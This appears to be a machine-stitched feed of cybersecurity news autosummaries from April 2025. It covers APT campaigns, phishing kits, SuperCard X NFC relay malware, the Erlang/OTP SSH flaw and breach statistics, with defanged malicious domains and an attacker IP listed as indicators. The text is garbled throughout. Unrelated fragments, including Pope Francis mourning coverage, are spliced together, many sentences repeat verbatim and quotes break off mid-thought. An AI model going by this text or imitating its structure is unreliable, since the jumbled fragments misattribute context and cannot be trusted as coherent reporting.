The activity targeted South Korea"s software, IT, financial, semiconductor manufacturing, and telecommunications industries, according to a report from Kaspersky published today. "Autosummary:
" "On the one hand, you need visibility into system calls; on the other, you need access to kernel structures and sufficient context to detect threats effectively," Amit Schendel, Head of Security Research at ARMO, said. "Autosummary:
The breakdown is as follows - Content Management Systems (CMS) (35) Network Edge Devices (29) Operating Systems (24) Open Source Software (14) Server Software (14) The leading vendors and their products that were exploited during the time period are Microsoft Windows (15), Broadcom VMware (6), Cyber PowerPanel (5), Litespeed Technologies (4), and TOTOLINK Routers (4). "Autosummary:
"Autosummary:
Hidden Malware and Data Harvesting Some malicious sites run hidden scripts that silently gather device names, OS, geolocation, and more data later sold on the dark web or used for phishing attack Threat actors used malware to steal login credentials, financial information, and personal files.Crooks exploit the death of Pope Francis Pierluigi Paganini April 24, 2025 April 24, 2025 Crooks exploit the death of Pope Francis, using public curiosity and emotion to launch scams and spread malware, an old tactic during global events. "Autosummary:
"Autosummary:
"Autosummary:
“While the interview was ongoing @tacticalinvest_ was downloading malware on my computer known as goopdate,” he reports, “which was powerful enough to steal >$100k in digital assets from my Bitcoin and Ethereum wallets, as well as log into my twitter, gmail, and other accounts.”As he describes in a postmortem thread on X earler this month, he also got a media invitation from an X account, this time called @tacticalinvest_, to appear on a podcast. "Autosummary:
The stolen data varies by patient and includes the following info: Full name Date of birth Home address Telephone number Email address Race/ethnicity Social Security number (SSN) Patient type Medical record number It was clarified that the exposure did not include financial information, medical records, or treatment details. "Autosummary:
"It begins with a simple notification: “Markets in Free Fall.” Within moments, the headlines multiply: new tariffs, emergency actions, plummeting consumer confidence. Across boardrooms and break rooms, anxiety ripples at every level. People begin refreshing inboxes and apps for guidance from leadership teams, advisors, and experts. Right there, buried among legitimate memos and updates, the attacker slips in. A fake social media message. A bogus government alert. An urgent vendor notification that looks just convincing … More
The post When confusion becomes a weapon: How cybercriminals exploit economic turmoil appeared first on Help Net Security.
"Autosummary:
Threat actors impersonate officials, executives, and advisors, knowing that all they need is the illusion of authority in a moment of uncertainty.Within moments, the headlines multiply: new tariffs, emergency actions, plummeting consumer confidence. Defending effectively means thinking tactically, staying adaptive, and treating clarity as a strategic asset. "With billions of users, YouTube has become a tempting target for cybercriminals. They post malicious links in video descriptions and comments. Some send phishing emails to creators, posing as sponsors but attaching malware. Others hijack popular channels to promote fake cryptocurrency giveaways. Deepfake videos have entered the mix, using AI to impersonate well-known public figures. This article looks at the most common scams found on YouTube and how they work. Malware in video descriptions and … More
The post The dark side of YouTube: Malicious links, phishing, and deepfakes appeared first on Help Net Security.
"Autosummary:
But if platforms were held responsible for everything, they might over-censor to avoid potential liability, which could impact the diversity of content users see. But it also helps scan content, find patterns, and flags suspicious behavior.With its sophistication, it floods channels with deepfakes and AI-generated content, making it harder to tell what’s real and what’s fake. "Cybercriminals continued to shift to stealthier tactics, with lower-profile credential theft spiking, while ransomware attacks on enterprises declined, according to IBM. Researchers observed an 84% increase in emails delivering infostealers in 2024 compared to the prior year, a method threat actors relied heavily on to scale identity attacks. 70% of attacks in 2024 involved critical infrastructure. In this subset, the use of valid accounts made up 31% of initial access vectors, followed by phishing and … More
The post Phishing emails delivering infostealers surge 84% appeared first on Help Net Security.
"Autosummary:
As a result of these takedowns, we have seen increased diversification and turnover in the malware activity of actors associated with cybercrime groups such as ITG23, (Wizard Spider, TrickBot Group), ITG25 (Lunar Spider, IcedID), and ITG26 (Qakbot, Pikabot).The most common actions on objective included tool-remote access (17%), malware-backdoor (17%), and server access (13%), signaling attackers’ focus on system control and data exfiltration. "Application Security Analyst Greenway Health | India | Remote – View job details As an Application Security Analyst, you will conduct regular security assessments of applications, including static and dynamic analysis, to identify vulnerabilities in code, configurations, and third-party dependencies. Ensure application security practices comply with healthcare regulations and industry standards. Manage and configure vulnerability scanning and security testing tools to maximize coverage and efficiency. Application Security Engineer ControlUp | Israel | Hybrid – View … More
The post Cybersecurity jobs available right now: April 23, 2025 appeared first on Help Net Security.
"Autosummary:
Establish, implement, and monitor policies, standards, systems, and controls to ensure appropriate confidentiality, integrity, availability, safety, privacy, and recovery of information assets owned, managed, and processed by the organization. Penetration Tester PwC | Italy | Hybrid – View job details As a Penetration Tester, you will be looking for security vulnerabilities on web applications, infrastructure systems, network equipment, Wi-Fi systems, mobile applications, API, etc.Provide review and consultation to risk initiatives, events, incidents, controls and applied risk mitigation strategies Senior Incident Response Coordinator Northwave Cyber Security | Germany | On-site – View job details As a Senior Incident Response Coordinator, you will oversee the execution of incident response plans, manage resources, and guide teams through the lifecycle of cybersecurity incidents. Cyber Security Specialist Hisense | Slovenia | On-site – View job details As a Cyber Security Specialist, you will be responsible for the implementation, configuration, management, and maintenance of cybersecurity systems, as well as the optimization of existing systems. "Autosummary:
In one such instance, cybercriminals specifically focused on fraud automation against Barclays, Bank of Scotland, Lloyds Banking Group, Halifax, HSBC, Santander, Wise and Revolut. "Autosummary:
"Autosummary:
In any case, while modern email solutions can bring a lot more to the table, neither email or network (proxy) based tools can’t definitively know that a page is malicious unless they can access the page and analyze it… Attackers are preventing their pages from being analyzed Both email and network (proxy) based solutions rely on being able to inspect and analyze a page to identify whether it is malicious or not, after which IoCs are generated that can be enforced when a link is clicked (or received in your email inbox). A key challenge with phishing detection is that based on the indicators that we as an industry use to commonly detect phishing pages, pretty much every phishing attack looks different and uses a unique combination of domain, URL, IPs, page composition, target app, etc. Getting real-time visibility of page/user behavior and malicious toolkits running on the page is key to moving to TTP-based detections, rather than chasing quickly-changing IoCs The future of phishing detection and response is browser based Push Security provides a browser-based identity security solution that intercepts phishing attacks as they happen — in employee browsers.To detect and block a phishing page, it needs to be used in an attack first… Protect and defend your identity attack surface with Push Security Book a demo to see how Push"s browser-based identity security platform prevents account takeover attacks like MFA-bypass phishing, credential stuffing, password spraying, and session hijacking.Book a demo or try it for free Why most phishing attacks are completely novel Attackers know that phishing detection and blocking: Relies on blocklisting IoCs like domains, URLs and IPs Is situated at the email and network layer Requires that a page is accessed and analyzed before it can be blocked These methods have remained practically unchanged for more than a decade. With MFA-bypassing phishing kits the new normal, capable of phishing accounts protected by SMS, OTP, and push-based methods, detection controls are being put under constant pressure as prevention controls fall short. "Armis is expanding its vulnerability exposure and assessment capabilities with the free availability of the Armis Vulnerability Intelligence Database. The community-driven database integrates exploited vulnerabilities, emerging threats and AI-powered insights, providing the cybersecurity industry with the knowledge organizations need to better prioritize and mitigate threats in real time. The Armis Vulnerability Intelligence Database is powered by Armis Labs, Armis early warning capabilities and the Armis Asset Intelligence Engine. It also receives information from Armis Centrix … More
The post Armis expands vulnerability exposure and assessment capabilities appeared first on Help Net Security.
"Autosummary:
The community-driven database integrates exploited vulnerabilities, emerging threats and AI-powered insights, providing the cybersecurity industry with the knowledge organizations need to better prioritize and mitigate threats in real time. "NinjaOne announced new capabilities that unify vulnerability management and patching workflows, ensuring a risk-based approach to patching and reducing time to remediate vulnerabilities. The new tools automate the import of vulnerability data, giving IT teams continuous visibility into vulnerabilities, so they can prioritize and verify the successful applicationof patches, reducing organizations’ risk. “The rapid growth in the number and diversity of endpoint devices, driven by hybrid work and digital transformation, has significantly expanded organizational attack … More
The post NinjaOne unifies vulnerability and patch management appeared first on Help Net Security.
"Autosummary:
Additionally, because NinjaOne provides centralized visibility in a single console, IT teams can consider vulnerability data, manage patch administration, as well as leverage AI-driven patch sentiment to prioritize what matters. "The exploitation of vulnerabilities has seen another year of growth as an initial access vector for breaches, reaching 20%, according to Verizon’s 2025 Data Breach Investigations Report. Researchers analyzed 22,052 real-world security incidents, of which 12,195 were confirmed data breaches. This was an increase of 34% in relation to last year’s report. The presence of ransomware, with or without encryption, saw significant growth, a 37% increase from last year’s report. It was present in 44% … More
The post 2025 Data Breach Investigations Report: Third-party breaches double appeared first on Help Net Security.
"Autosummary:
In addition to passwords (regardless of hash status), researchers found email addresses (61% of breaches), phone numbers (39%), government-issued IDs (22%) and even the occasional passport (1.8%).However, the context around vulnerabilities – where a given vulnerability exists in your environment, what data or systems are potentially at risk, ease of exploitation, the existence of a proof-of-concept, and so much more – drives informed prioritization and remediation. Although the involvement of the human element in breaches remained roughly the same as last year, hovering around 60%, the percentages of breaches where a third party was involved doubled, going from 15% to 30%. "Autosummary:
Assessed to be operating on behalf of the Iranian Ministry of Intelligence and Security (MOIS), the hacking group is known for targeting a wide range of industry verticals in Israel, including academia, tourism, communications, finance, transportation, healthcare, government, and technology. "Autosummary:
Contact lists Current date and geolocation Information about stored files, and App version Besides sending the victim"s location every time it changes to a Telegram bot, the spyware supports the ability to download and run additional modules that allow it to exfiltrate files of interest, particularly those sent via Telegram and WhatsApp. "Autosummary:
But you get much better visibility of all this in the browser, with access to: Full decrypted HTTP traffic — not just DNS and TCP/IP metadata Full user interaction tracing — every click, keystroke, or DOM change can be traced Full inspection at every layer of execution, not just initial HTML served Full access to browser APIs, to correlate with browser history, local storage, attached cookies, etc. Being in the browser enables you to build much more effective controls based on TTPs And with this new visibility, because you"re in the browser and seeing the page at the same time as the user is interacting with it, you can… #3: Intercept in real time, not post mortem For non-browser solutions, real-time phishing detection is basically nonexistent. With MFA-bypassing phishing kits the new normal, capable of phishing accounts protected by SMS, OTP, and push-based methods, detection controls are being put under constant pressure as prevention controls fall short. But attackers know this, and are taking steps to avoid these controls, by: Routinely evading IoC driven blocklists by dynamically rotating and updating commonly signatured elements like IPs, domains, and URLs.When endpoint attacks skyrocketed in the late 2000s / early 2010s, they took advantage of the fact that defenders were trying to detect malware with primarily network-based detections, signature-based analysis of files, and running files in sandboxes (which was reliably defeated with sandbox-aware malware and using things as simple as putting an execution delay in the code). "Autosummary:
"These recently observed attacks rely heavily on one-on-one interaction with a target, as the threat actor must both convince them to click a link and send back a Microsoft-generated code," security researchers Charlie Gardner, Josh Duke, Matthew Meltzer, Sean Koessel, Steven Adair, and Tom Lancaster said in an exhaustive analysis. Volexity said it also observed an earlier iteration of the campaign that redirects users to the website "vscode-redirect.azurewebsites[.]net," which, in turn, redirects to the localhost IP address (127.0.0.1). "Autosummary:
Specifically, the spyware performs the following actions: Sends the user"s phone number, contacts, geolocation, file info, and app version to attackers. "Autosummary:
A brief description of each of the threat actors is below - UNC1069 (Active since at least April 2018), which targets diverse industries for financial gain using social engineering ploys by sending fake meeting invites and posing as investors from reputable companies on Telegram to gain access to victims" digital assets and cryptocurrency (Active since at least April 2018), which targets diverse industries for financial gain using social engineering ploys by sending fake meeting invites and posing as investors from reputable companies on Telegram to gain access to victims" digital assets and cryptocurrency UNC4899 (Active since 2022), which is known for orchestrating job-themed campaigns that deliver malware as part of a supposed coding assignment and has previously staged supply chain compromises for financial gain (Overlaps with Jade Sleet, PUKCHONG, Slow Pisces, TraderTraitor, and UNC4899) (Active since 2022), which is known for orchestrating job-themed campaigns that deliver malware as part of a supposed coding assignment and has previously staged supply chain compromises for financial gain (Overlaps with Jade Sleet, PUKCHONG, Slow Pisces, TraderTraitor, and UNC4899) UNC5342 (Active since January 2024), which is also known for employing job-related lures to trick developers into running malware-laced projects (Overlaps with Contagious Interview, DeceptiveDevelopment, DEV#POPPER, and Famous Chollima) Another North Korean threat actor of note is UNC4736, which has singled out the blockchain industry by trojanizing trading software applications and has been attributed to a cascading supply chain attack on 3CX in early 2023. "Autosummary:
To her, Pope Francis meant "hope", and his more progressive social views were "very important", she said.Fredrik, who is from Ghana but came from Poland, said the Pope had "done his best" and "it is left to us to continue the good works".The pontiff"s body, laid out in an open coffin, was moved to the church in a formal procession Mourners are paying their respects to Pope Francis, whose body was moved from his Vatican residence to St Peter"s Basilica before his funeral on Saturday. "Autosummary:
"Autosummary:
It is favored by cybercriminals because it is: Free, meaning threat actors can launch campaigns at scale with a potentially lucrative return on their investment Trusted by users, which increases the chances of victims believing that the Google Form they’re being sent or redirected to is legitimate A legitimate service, meaning that malicious Google Forms and links to malicious forms are often waved through by traditional email security tools Easy to use, which is good for users but also handy for cybercriminals – meaning they can launch convincing phishing campaigns with very little effort or prior knowledge of the tool Cybercriminals also take advantage of the fact that Google Forms communications are encrypted with TLS, which may make it harder for security tools to peer in and check for any malicious activity.Either way, the end goal is usually to: Harvest your log-ins, which can then be used to hijack accounts and commit identity fraud Steal your card details or banking/crypto information in order to take over these accounts and drain them of funds or commit payment fraud Persuade you to click on a link in the malicious Google Form that redirects you to a site which covertly installs malware on your machine Call back phishing Attackers send you a malicious Google Form crafted to trick you into calling a phone number listed on it. Attacks in the wild Among the real-world campaigns security researchers have seen in recent years are: BazarCall A vishing-type threat in which victims received an email containing a malicious Google Form impersonating PayPal, Netflix, or one of several other big-name brands.Here are some of the main techniques to look out for: Phishing-related forms Threat actors create Google Forms designed to spoof legitimate brands, such as log-in pages for social media sites, banks and universities, or even payment pages. "Autosummary:
Then last month, Cisco Talos connected the Lotus Panda actor to intrusions aimed at government, manufacturing, telecommunications, and media sectors in the Philippines, Vietnam, Hong Kong, and Taiwan with a backdoor known as Sagerunex. "Autosummary:
Abilene city, Texas, takes systems offline following a cyberattack Pierluigi Paganini April 22, 2025 April 22, 2025 Abilene, Texas, shut down systems after a cyberattack caused server issues. "Perforce Software announced its latest platform update for Puppet Enterprise Advanced, designed to streamline DevSecOps practices and fortify enterprise security postures. This release incorporates more advanced and proactive remediation options, allowing organizations to accelerate their response to security vulnerabilities by fostering greater collaboration between platform and security teams. A 2024 study by Statista reported that the average age of cyber vulnerabilities is 229 days, leaving companies and their customers vulnerable to security breaches and being … More
The post Perforce Puppet update accelerates vulnerability remediation appeared first on Help Net Security.
"Autosummary:
"There are now several public proof-of-concept (PoC) exploits for a maximum-severity vulnerability in the Erlang/OTP SSH server (CVE-2025-32433) unveiled last week. “All users running an SSH server based on the Erlang/OTP SSH library are likely to be affected by this vulnerability. If your application uses Erlang/OTP SSH to provide remote access, assume you are affected,” Ruhr University Bochum researchers, who discovered and reported the flaw, said. About CVE-2025-32433 Erlang/OTP SSH is a set of libraries … More
The post PoC exploit for critical Erlang/OTP SSH bug is public (CVE-2025-32433) appeared first on Help Net Security.
"Autosummary:
Consequently, this vulnerability may lead to full compromise of hosts, allowing for unauthorized access to and manipulation of sensitive data by third parties, or denial-of-service attacks,” Fabian Bäumer, Chair for Network and Data Security at Ruhr University Bochum, explained in a post on the OSS-SEC mailing list last Wednesday. “Users are advised to update to OTP-27.3.3 (for OTP-27), OTP-26.2.5.11 (for OTP-26), or OTP-25.3.2.20 (for OTP-25) to mitigate this issue,” the CVE-2025-32433 advisory recommends. "Autosummary:
"This vulnerability lets attackers with edit permissions in Cloud Composer to escalate their access to the default Cloud Build service account, which has high-level permissions across GCP services like Cloud Build itself, Cloud Storage, and Artifact Registry," Liv Matan, senior security researcher at Tenable, said in a report shared with The Hacker News. "By manipulating the name of server-level firewall rules through T-SQL, a threat actor with privileged access to an Azure SQL Server can inject an implant that, based on specific user actions, deletes arbitrary Azure resources that the user has permissions for," security researcher Coby Abrams said. "Autosummary:
"The first thing to note is that this is a valid, signed email – it really was sent from no-reply@google.com," Nick Johnson, the lead developer of the Ethereum Name Service (ENS), said in a series of posts on X. "It passes the DKIM signature check, and Gmail displays it without any warnings – it even puts it in the same conversation as other, legitimate security alerts. "Autosummary:
"Autosummary:
"Typically, traditional cryptojacking attacks rely on using XMRig to directly mine cryptocurrency, however as XMRig is highly detected, attackers are shifting to alternative methods of generating crypto," Darktrace said. "Autosummary:
While it"s not widely used worldwide like Gmail or Outlook, Active! is often used as a groupware component in Japanese-language environments of large corporations, universities, government agencies, and banks. "Autosummary:
"As a workaround, stop the Session Recording Monitoring service, install the Microsoft security update, and enable the Session Recording Monitoring service," explains a Citrix support bulletin. "Autosummary:
The company offers cellular service, along with 5G development, AI services, IoT solutions, cloud computing, and smart city infrastructure. "Autosummary:
While M&S stores, its website, and its app remain operational, the company says that the cyberattack has caused some disruption to its operations. "Attackers are focusing more on stealing identities. Because of this, companies need to use zero trust principles. They should also verify user identities more carefully, says DirectDefense. Researchers analyzed thousands of alerts, mapping them to the MITRE ATT&CK framework, a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. Top five attack tactics Initial access: Initial access remains the most frequently-observed adversarial tactic, representing more than 27% of escalated alerts. In 2024, … More
The post Cybercriminals blend AI and social engineering to bypass detection appeared first on Help Net Security.
"Autosummary:
AI has allowed attackers to bypass all the usual red flags you’re taught to look for, like grammatical errors, misspelled words, non-regional speech or writing, and a lack of context to your organization. “Attackers have honed their techniques to become faster and more powerful against a company’s defenses; conversely, security solutions are less able to withstand attacks on their own and need constant monitoring and tuning,” said Jim Broome, President and CTO for DirectDefense. "Oracle has released version 8 of its Unbreakable Enterprise Kernel (UEK), a custom Linux kernel built for Oracle Linux. UEK 8 includes updates to memory management, better file system support, faster networking, and improvements for specific hardware platforms. It also pulls in changes from the wider Linux community. UEK 8 is designed to handle heavy workloads. It builds on the combination of Oracle Linux and UEK to support large enterprise systems. That includes setups using … More
The post Oracle releases Unbreakable Enterprise Kernel 8 (UEK 8) appeared first on Help Net Security.
"Autosummary:
It’s based on the latest long-term stable Linux kernel and works on 64-bit Intel, AMD (x86-64), and Arm (aarch64) systems. "Autosummary:
" Trustwave"s latest analysis has revealed that the malicious requests originating from one of Proton66 net blocks (193.143.1[.]65) in February 2025 attempted to exploit some of the most recent critical vulnerabilities - CVE-2025-0108 - An authentication bypass vulnerability in the Palo Alto Networks PAN-OS software - An authentication bypass vulnerability in the Palo Alto Networks PAN-OS software CVE-2024-41713 - An insufficient input validation vulnerability in the NuPoint Unified Messaging (NPM) component of Mitel MiCollab - An insufficient input validation vulnerability in the NuPoint Unified Messaging (NPM) component of Mitel MiCollab CVE-2024-10914 - A command injection vulnerability D-Link NAS - A command injection vulnerability D-Link NAS CVE-2024-55591 & CVE-2025-24472 - Authentication bypass vulnerabilities in Fortinet FortiOS It"s worth noting that the exploitation of the two Fortinet FortiOS flaws has been attributed to an initial access broker dubbed Mora_001, which has been observed delivering a new ransomware strain called SuperBlack. "Autosummary:
New sophisticate malware SuperCard X targets Androids via NFC relay attacks Pierluigi Paganini April 21, 2025 April 21, 2025 ‘SuperCard X’ – a new MaaS – targets Androids via NFC relay attacks, enabling fraudulent POS and ATM transactions with stolen card data. SuperCard X uses a modular setup with two apps: “Reader” (blue icon) is deployed on victim devices to capture NFC card data, and the “Tapper” (green icon) that runs on attacker devices to relay and misuse the stolen data. "Autosummary:
Check Point Research team reported that Russia-linked cyberespionage group APT29 (aka SVR group, Cozy Bear, Nobelium, BlueBravo, Midnight Blizzard, and The Dukes) is behind a sophisticated phishing campaign targeting European diplomatic entities, using a new WINELOADER variant and a previously unknown malware called GRAPELOADER.Russia-linked APT29 targets European diplomatic entities with GRAPELOADER malware Pierluigi Paganini April 21, 2025 April 21, 2025 Russia-linked group APT29 targeted diplomatic entities across Europe with a new malware loader codenamed GRAPELOADER. "Autosummary:
This week"s list includes — CVE-2025-2492 (ASUS), CVE-2025-24054 (Microsoft Windows), CVE-2025-32433 (Erlang/OTP), CVE-2021-20035 (SonicWall Secure Mobile Access 100 Series), CVE-2025-31200, CVE-2025-31201 (Apple iOS, iPadOS, macOS Sequoia, tvOS, and visionOS), CVE-2025-24859 (Apache Roller), CVE-2025-1093 (AIHub theme), and CVE-2025-3278 (UrbanGo Membership plugin) 📰 Around the Cyber World Google Makes :visited More Private — Google is finally taking steps to plug a long-standing privacy issue that, for over 20 years, enabled websites to determine users" browsing history through the previously visited links.The countries with the most victims of this campaign are Mexico (456), India (100), Bahrain (82), Morocco (69), Pakistan (58), Indonesia (54), Israel (51), Uzbekistan (43), Algeria (38), and Cyprus (31).The countries with the most victims of this campaign are Mexico (456), India (100), Bahrain (82), Morocco (69), Pakistan (58), Indonesia (54), Israel (51), Uzbekistan (43), Algeria (38), and Cyprus (31)." — U.S. allies like Japan, South Korea, and New Zealand are among the 35 countries where mobile providers employ China-based networks, including China Mobile International, China Telecom Global, China Unicom Global, CITIC Telecom International, and PCCW Global Hong Kong, for routing sensitive mobile traffic, opening travelers and residents in those nations to potential surveillance.35 Countries Use Chinese Networks for Routing Mobile User Traffic — U.S. allies like Japan, South Korea, and New Zealand are among the 35 countries where mobile providers employ China-based networks, including China Mobile International, China Telecom Global, China Unicom Global, CITIC Telecom International, and PCCW Global Hong Kong, for routing sensitive mobile traffic, opening travelers and residents in those nations to potential surveillance.Some of the top observed malware families included web shells, Cobalt Strike, Akira, Lumma Stealer, LockBit, Fog, ChromeLoader, GootLoader, RansomHub, and Black Basta.Some of the top observed malware families included web shells, Cobalt Strike, Akira, Lumma Stealer, LockBit, Fog, ChromeLoader, GootLoader, RansomHub, and Black Basta.Also targeted were victims in Spain (12), the Netherlands (11), Syria (11), Hungary (8), France (7), United Kingdom (2), and the United States (1).Also targeted were victims in Spain (12), the Netherlands (11), Syria (11), Hungary (8), France (7), United Kingdom (2), and the United States (1).The development comes as a 24-year-old Huddersfield man, Zak Coyne, was sentenced in the U.K. to eight-and-a-half years in prison for his role in creating, operating, and administering the LabHost service, which was used by more than 2,000 criminals to defraud victims all over the world.The development comes as a 24-year-old Huddersfield man, Zak Coyne, was sentenced in the U.K. to eight-and-a-half years in prison for his role in creating, operating, and administering the LabHost service, which was used by more than 2,000 criminals to defraud victims all over the world. — The China-linked threat actor known as Mustang Panda targeted an unspecified organization in Myanmar with an updated version of its signature backdoor, TONESHELL, in addition to debuting four new attack tools: two keyloggers (PAKLOG and CorKLOG), a utility for facilitating lateral movement (StarProxy), and a driver to evade endpoint detection and response (EDR) software (SplatCloak).Mustang Panda Targets Myanmar with New Tooling — The China-linked threat actor known as Mustang Panda targeted an unspecified organization in Myanmar with an updated version of its signature backdoor, TONESHELL, in addition to debuting four new attack tools: two keyloggers (PAKLOG and CorKLOG), a utility for facilitating lateral movement (StarProxy), and a driver to evade endpoint detection and response (EDR) software (SplatCloak).The service is offered for $199 a month, with customizable phishing pages available for 17 Canadian banks, 4 U.S.-based banks, email providers, telecom companies, toll road collections, and crypto services.The service is offered for $199 a month, with customizable phishing pages available for 17 Canadian banks, 4 U.S.-based banks, email providers, telecom companies, toll road collections, and crypto services. 🔔 Top News North Korea Targets Crypto Developers with Fake Python Coding Challenges — The North Korea-linked threat actor known as Slow Pisces (aka Jade Sleet, PUKCHONG, TraderTraitor, and UNC4899) is targeting developers, particularly in the cryptocurrency sector, to deliver new stealer malware under the guise of a coding assignment.A coordinated operation conducted by Belgium, France, Germany, the Netherlands, Spain, and Türkiye has resulted in the arrests of 232 suspects and seizures of EUR300 million worth of assets, including 681 properties and 127 vehicles.A coordinated operation conducted by Belgium, France, Germany, the Netherlands, Spain, and Türkiye has resulted in the arrests of 232 suspects and seizures of EUR300 million worth of assets, including 681 properties and 127 vehicles. — The North Korea-linked threat actor known as Slow Pisces (aka Jade Sleet, PUKCHONG, TraderTraitor, and UNC4899) is targeting developers, particularly in the cryptocurrency sector, to deliver new stealer malware under the guise of a coding assignment. "Autosummary:
"Autosummary:
The new Android malware, the work of a Chinese-speaking threat actor, has been observed being propagated via three different bogus apps, duping victims into installing them via social engineering techniques like deceptive SMS or WhatsApp messages - Verifica Carta (io.dxpay.remotenfc.supercard11) SuperCard X (io.dxpay.remotenfc.supercard) KingCard NFC (io.dxpay.remotenfc.supercard) The messages impersonate bank security alerts to induce a false sense of urgency by urging recipients to call a specific number to dispute the transaction. "Autosummary:
Since September 2023, the North Korean APT has targeted organizations in South Korea, the U.S., China, Japan, Germany, Singapore, and several other countries. "Autosummary:
"It was incredible to feel listened to... through the years I"ve told him I feel like Lazarus: you were dead, nobody hears you, nobody cares, and suddenly the most important person does care, and sincerely cares, and makes a big change. Getty Images Worshippers gathered at Baclaran Church in Paranaque, Metro Manila, to pay their respects to the late Pope Catholics in rebel-held Bukavu, a city in eastern Democratic Republic of Congo, have gathered at Notre-Dame de la Paix Cathedral to mourn.One woman who heard his address said: "He took his duty to the people so seriously - even when he was so unwell yesterday, he still came out, he was still part of the Easter mass, he still got to speak to us." "Autosummary:
Although the exact nature of the payload is unclear, Check Point said it identified updated WINELOADER artifacts uploaded to the VirusTotal platform with compilation timestamps matching that of "AppvIsvSubsystems64.dll." "With this information, and the fact that GRAPELOADER replaced ROOTSAW, an HTA downloader used in past campaigns to deliver WINELOADER, we believe that GRAPELOADER ultimately leads to the deployment of WINELOADER," the cybersecurity company said. It"s worth noting that the downloader and the LNK dropper refer to the same two payloads that the Symantec Threat Hunter team, part of Broadcom, revealed earlier this month as part of an attack chain distributing an updated version of the GammaSteel stealer - NTUSER.DAT.TMContainer00000000000000000001.regtrans-ms (Downloader) NTUSER.DAT.TMContainer00000000000000000002.regtrans-ms (LNK dropper) "Gamaredon operates as a critical component of Russia"s cyber operations strategy, particularly in its ongoing war with Ukraine," the company said. "Autosummary:
"Autosummary:
ClickFix page for fake device registration Source: Microsoft A new report from Proofpoint reveals that, between late 2024 and early 2025, Kimsuky (North Korea), MuddyWater (Iran), and also APT28 and UNK_RemoteRogue (Russia) have all used ClickFix in their targeted espionage operations. "Autosummary:
The packages in question are listed below - According to supply chain security firm Socket, the packages are designed to mimic node-telegram-bot-api, a popular Node.js Telegram Bot API with over 100,000 weekly downloads. "Autosummary:
The vulnerability impacts SMA 200, SMA 210, SMA 400, SMA 410, and SMA 500v devices, the vendor addressed the vulnerability in September 2021. "Autosummary:
A new malware-as-a-service (MaaS) platform named "SuperCard X" has emerged, targeting Android devices via NFC relay attacks that enable point-of-sale and ATM transactions using compromised payment card data. "Autosummary:
The flaw was fixed in versions 25.3.2.10 and 26.2.4, but as the paltform is commonly used in telecom infrastructure, databases, and high-availability systems, it may not be easy to update devices immediately. "Should we negotiate? Should we pay? These are the questions every organization faces when cybercriminals lock their data. By the time attackers have encrypted your systems, the focus shifts from prevention to response. It’s no longer about how it happened, it’s about what you’re willing to do next. Ransomware gangs are becoming more organized and aggressive, and many now operate like businesses. They have customer service, payment portals, and negotiation playbooks. No organization is off-limits. … More
The post When ransomware strikes, what’s your move? appeared first on Help Net Security.
"Autosummary:
Tim Morris, Chief Security Advisor at Tanium, said: “If it was just a legal and ethical consideration, as a matter of principle, you should not pay, and law enforcement will agree with that approach. In May 2021, Colonial Pipeline, a major US fuel supplier, was attacked by the DarkSide ransomware group. Tabletop exercises Simulated ransomware attacks, or tabletop exercises, prepare teams for real incidents. “A third-party highly skilled incident response team can offer businesses a plethora of expertise under one roof that may be missing from traditional in-house security teams,” said Azeem Aleem, MD of UK and Northern Europe at Sygnia.These include the dismantling of LockBit’s infrastructure, charges against the Phobos ransomware administrator, the disruption of the Radar/Dispossessor group, and the takedown of ALPHV/BlackCat leak sites. "Autosummary:
"Autosummary:
The company offers a 360-degree service platform that includes strategic planning, sales, partnerships, hospitality, merchandise, and technology solutions. "Autosummary:
"Autosummary:
Here’s what makes organizations prime targets: Weak password policies create an open invitation for attackers to easily guess or crack credentials through automated tools and common password lists Failure to implement multi-factor authentication leaves even the strongest passwords vulnerable to theft Inadequate security training makes employees more vulnerable to phishing emails, social engineering tactics, and other attacks Poor network segmentation gives hackers open access once they breach a single endpoint Insufficient monitoring lets attackers operate undetected for days, weeks, or even months inside your critical systems Employee password reuse amplifies the impact of any breach, as a single stolen credential can unlock multiple systems across personal and corporate environments. Why credential-based attacks are hackers" preferred method Cybercriminals favor credential-based attacks for several reasons: They’re easy to execute: Credential-based attacks are relatively simple to deploy compared to more complex zero-day exploits.By implementing multi-factor authentication, enforcing strong password policies, training your staff regularly, auditing you Active Directory frequently and properly segmenting your network, you’ll reduce your organization"s vulnerability.With this in mind, give all relevant stakeholders clear, factual updates, including senior management, legal teams, and affected users. "Autosummary:
This week, Cisco also released security patches for a privilege escalation flaw (CVE-2025-20178) in Secure Network Analytics" web-based management interface, which can let attackers with admin credentials run arbitrary commands as root. "CVE-2021-20035, an old vulnerability affecting Sonicwall Secure Mobile Access (SMA) 100 series appliances, is being exploited by attackers. Sonicwall confirmed it by updating the original security advisory to reflect the new state of play, and by changing the description of the vulnerability to say that can potentially lead to code execution, instead of only to denial of service (DoS). About CVE-2021-20035) Sonicwall SMA 100 series appliances provide a unified secure access gateway optimized for small … More
The post Sonicwall SMA100 vulnerability exploited by attackers (CVE-2021-20035) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The latest version of the malware is capable of accepting nearly 40 commands, allowing it to perform file management operations, execute commands via cmd.exe, spawn and kill processes, manage services, and connect to network resources via dedicated DLL modules. "Autosummary:
Security patches are available for the following devices: iPhone XS and later, iPad Pro 13-inch, iPad Pro 13.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later. “Minimal interaction with a malicious file by a user such as selecting (single-click), inspecting (right-click), or performing an action other than opening or executing the file could trigger this vulnerability.” "Autosummary:
The company offers a 360-degree service platform that includes strategic planning, sales, partnerships, hospitality, merchandise, and technology solutions. "Autosummary:
The researchers say they detected the malicious captcha on four different sites, mimicking Microsoft or Advanced IP Scanner portals: microsoft-msteams[.]com/additional-check.html microstteams[.]com/additional-check.html ecologilives[.]com/additional-check.html advanceipscaner[.]com/additional-check.html "Autosummary:
"Autosummary:
It also implies that a lot of incidents went unreported since we find it hard to believe that the number of scams might have declined—all it takes is a look at any single week in news coverage on Malwarebytes Labs to find stories on new scams, old scams, repeated scams, and the no-good scammers behind them.The idea is to get the target to tell them they’ve got a wrong number and with that engage them in a conversation, which may lead to romance scams, pig butchering, or other investment scams. "Autosummary:
The phishing campaigns, per the company, impersonate U.S. electronic toll collection systems like E-ZPass, sending SMS messages and Apple iMessages to individuals across Washington, Florida, Pennsylvania, Virginia, Texas, Ohio, Illinois, and Kansas about an unpaid toll and clicking on a fake link sent in the chat. "Autosummary:
